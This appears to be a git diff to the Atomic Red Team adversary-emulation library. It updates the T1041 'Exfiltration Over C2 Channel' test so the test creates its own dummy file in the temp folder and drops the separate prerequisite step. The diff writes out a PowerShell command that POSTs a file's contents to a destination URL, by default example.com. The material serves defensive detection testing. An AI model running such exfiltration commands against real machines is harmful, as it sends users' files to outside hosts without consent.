diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2bf4e794..8bf51ace 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -71612,25 +71612,12 @@ exfiltration: filepath: description: The file which is being exfiltrated to the C2 Server. type: Path - default: C:\Users\$env:UserName\LineNumbers.txt - dependency_executor_name: powershell - dependencies: - - description: 'The file to be exfiltrated must be present on the machine. Running - the pre-reqs will create a sample file to be exfiltrated, else give the - path of already present file as input. - -' - prereq_command: 'if ([System.IO.File]::Exists("#{filepath}")){exit 0} else - {exit 1} - -' - get_prereq_command: "echo \"Creating file to be exfiltrated\" \n1..100 | ForEach-Object - { Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n" + default: "$env:TEMP\\LineNumbers.txt" executor: - command: | - [System.Net.ServicePointManager]::Expect100Continue = $false - $filecontent = Get-Content -Path #{filepath} - Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive + command: "if(-not (Test-Path #{filepath})){ \n 1..100 | ForEach-Object { + Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue + = $false\n$filecontent = Get-Content -Path #{filepath}\nInvoke-WebRequest + -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive\n" name: powershell T1011: technique: diff --git a/atomics/T1041/T1041.md b/atomics/T1041/T1041.md index 2d8b0c5b..79c6bc1b 100644 --- a/atomics/T1041/T1041.md +++ b/atomics/T1041/T1041.md @@ -25,13 +25,16 @@ Exfiltrates a file present on the victim machine to the C2 server. | Name | Description | Type | Default Value | |------|-------------|------|---------------| | destination_url | Destination URL to post encoded data. | String | example.com| -| filepath | The file which is being exfiltrated to the C2 Server. | Path | C:\Users\$env:UserName\LineNumbers.txt| +| filepath | The file which is being exfiltrated to the C2 Server. | Path | $env:TEMP\LineNumbers.txt| #### Attack Commands: Run with `powershell`! ```powershell +if(-not (Test-Path #{filepath})){ + 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." } +} [System.Net.ServicePointManager]::Expect100Continue = $false $filecontent = Get-Content -Path #{filepath} Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive @@ -40,19 +43,6 @@ Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -Disab -#### Dependencies: Run with `powershell`! -##### Description: The file to be exfiltrated must be present on the machine. Running the pre-reqs will create a sample file to be exfiltrated, else give the path of already present file as input. -##### Check Prereq Commands: -```powershell -if ([System.IO.File]::Exists("#{filepath}")){exit 0} else {exit 1} -``` -##### Get Prereq Commands: -```powershell -echo "Creating file to be exfiltrated" -1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." } -``` - -